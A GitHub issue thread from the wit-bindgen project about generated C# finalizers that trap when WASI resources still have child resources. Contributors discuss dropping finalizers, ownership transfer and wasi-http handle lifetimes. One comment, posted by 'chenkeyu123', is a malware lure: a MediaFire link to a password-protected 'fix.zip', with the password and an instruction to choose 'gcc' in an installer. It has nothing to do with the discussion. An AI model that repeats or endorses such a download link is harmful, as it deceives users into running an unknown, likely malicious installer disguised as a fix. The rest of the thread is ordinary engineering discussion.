### ISSUE TITLE
C#: the generated finalization logic does not take child resources into account

### ISSUE THREAD

**Issue by SingleAccretion** [bytecodealliance/wit-bindgen#1039]
Currently, the generated resource types have a finalizer, like [this](https://github.com/dotnet/runtime/blob/7ff684af49cdf008bebbe10efcc10a2649795d65/src/libraries/System.Net.Http/src/System/Net/Http/WasiHttpHandler/WasiHttpWorld.wit.imports.wasi.http.v0_2_1.ITypes.cs#L5279-L5281).

This logic is not correct if the resource type may have child resources - this will trap on `drop`. See also this [Discord discussion](https://discord.com/channels/143867839282020352/1141126727028985877/1278079699972788325).

(Side note: it is also not correct due to https://github.com/dotnet/runtime/issues/103522, but that's a different story.)

Options:
1) Drop the finalizer. It means the user code will be exposed to leaks and traps on incorrect usage, but at least they will be determinisic (finalizers are not deterministic). I will mention that _traps_ in managed code are to be avoided, since they can't be converted to managed exceptions (it's like sending `SIGSEGV` instead of raising a `NullReferenceException`).
2) Design some sort of automatic scheme that would close the child resources. This is complicated by the fact that the parent-child relationship is currently only encoded in documentation (it means this can only be done for 'well-known' resource types).
3) Something else?

@dicej, @yowl, @pavelsavara (I would also recommend tagging the .NET interop team)

**Comment by pavelsavara** [comment]
cc @jsturtevant

**Comment by chenkeyu123** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pavelsavara** [comment]
It will trap with `resource has children`
full trace https://gist.github.com/pavelsavara/400212c6fe25b6bb7b94e6432446c76f

**Comment by jsturtevant** [comment]
Reading through the Discord thread, it sounds like there was general agreement to go with option 1 in the short term and force the user to implement via using statements?

>Design some sort of automatic scheme that would close the child resources. This is complicated by the fact that the parent-child relationship is currently only encoded in documentation (it means this can only be done for 'well-known' resource types).

Is it worth bringing up in the WASI design?

**Comment by yowl** [comment]
It seems that in some cases, where the ownership of a child resource is transferred to another resource, then we do now from the wit (no `borrow`) that we should dispose of the child.

**Comment by pchickey** [comment]
Our goal with child resources is to eventually have a way to encode that relationship in the wit and component model type system, but that mechanism doesn't exist yet, so we had to settle for documenting it. We understand this isn't ideal but this is the first time its come up in bindings generation, to my knowledge. (In other language bindings, behaving correctly gets punted to the user.)

**Comment by SingleAccretion** [comment]
> like there was general agreement to go with option 1 in the short term and force the user to implement via using statements?

There is no other option for the short term. But I don't think is a tenable production solution.

**Comment by dicej** [comment]
> It seems that in some cases, where the ownership of a child resource is transferred to another resource, then we do know from the wit (no `borrow`) that we should dispose of the child.

Yes, and `wit-bindgen` already handles that correctly and automatically by setting the `Handle` property to zero (meaning "no handle; nothing to dispose of").

**Comment by pavelsavara** [comment]
At the moment I'm confused if `outgoing-request` handle needs to be kept alive until end of the response streaming.
Note that in C# the response `Content` stream is passed to the user, which will typically relies on C# GC to do the cleanup (much later).
That means we are possibly keeping some request related host buffers/objects alive until then.
Maybe not, but I'm struggling to understand the parent/child graph just by reading the WITs.

**Comment by pavelsavara** [comment]
It would be great to improve `resource has children` message to at least say handle numbers of children which are still alive.

**Comment by dicej** [comment]
> At the moment I'm confused if `outgoing-request` handle needs to be kept alive until end of the response streaming.

`outgoing-handler/handle` [consumes](https://github.com/WebAssembly/wasi-http/blob/f45069dcd486b2ece74f5623de4b72050cbce983/wit/handler.wit#L45-L49) the `outgoing-request` handle, so the guest won't have access to it anyway once the request is sent.

Also, you _can_ dispose of the `incoming-response` after calling [consume](https://github.com/WebAssembly/wasi-http/blob/f45069dcd486b2ece74f5623de4b72050cbce983/wit/types.wit#L480) on it since you will have taken ownership of the the returned `incoming-body` handle (i.e. it is no longer a child of the `incoming-response` once you've called `consume`).  The docs could definitely be clearer about that.
